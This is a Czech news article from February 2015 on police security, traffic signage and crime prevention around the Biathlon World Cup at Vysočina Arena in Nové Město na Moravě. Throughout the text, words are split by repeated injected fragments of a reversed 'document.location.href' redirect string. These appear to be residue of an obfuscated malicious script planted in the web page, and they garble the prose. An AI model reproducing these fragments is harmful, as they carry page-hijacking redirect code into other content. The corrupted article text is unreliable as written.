Rainbow page separator

Policisté na biatlon připravili bezpečnostní opatření

Pátek, 6. února 2015

Pohled z tribuny Vysočina arény při biatlonu 2015

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Do bezpečnostního opatření, které platí v souvislosti s konáním Svě[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tového poháru v biatlonu v novoměstské Vysočina Areně, bude každý den zapojeno na osm desítek policistů. „Museli jsme především pečlivě vyhodnotit všechna možná rizika nejen s ohledem na lokalitu, kde bude akce probíhat, ale také s ohledem na předpokládaný počet účastníků a návštěvníků, mezi nimiž je také vysoký počet cizinců. Nejen všechny výpravy spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovců, ale především diváci, se musí do areálu Vysočina Areny v Novém Městě na Moravě po všechny tři dny dopravit a poté svá vozidla zaparkovat, což bude klást vysoké nároky zejména na realizaci opatření v dopravě,“ uvedl ředitel Krajského ředitelství policie Kraje Vysočina Radek Malíř.

V Novém Městě a jeho okolí bylo kromě dočasného svislého dopravního značení rozmístěno deset proměnných dopravních tabulí, na nichž budou řidiči informování o aktuálním vývoji v dopravě. Tabule budou ovládat policisté pomocí počítače přímo z řídícího štábu. „Po jejich nasazení při Mistrovství světa v biatlonu v roce 2013 mohu říci, že se nám osvědčily. Jejich výhodou je především rychlost a aktuálnost informací, které můžeme podle vývoje v zatíženosti komunikací a zaplněnosti parkovacích ploch operativně měnit. Řidiči tak včas uvidí, kam mají odbočit, aby bez větších obtíží projeli a poté zaparkovali,“ doplnil Jan Kostečka, vedoucí krajského odboru služby dopravní policie.

Do opatření jsou nasazeni i policisté pořádkové policie. „Pro pěší i mo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torizované hlídky bude důležitým úkolem moni[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torovat situaci na příchodových a odchodových trasách fanoušků. Naším hlavním cílem je zajistit v místě veřejný pořádek a chránit majetek občanů před případnými pachateli trestné činnosti,“ sdělil Karel Sehnal, velitel bezpečnostního opatření. Policisté se budou snažit eliminovat riziko vloupání do aut i jejich odcizení, kapesních krádeží a další kriminality.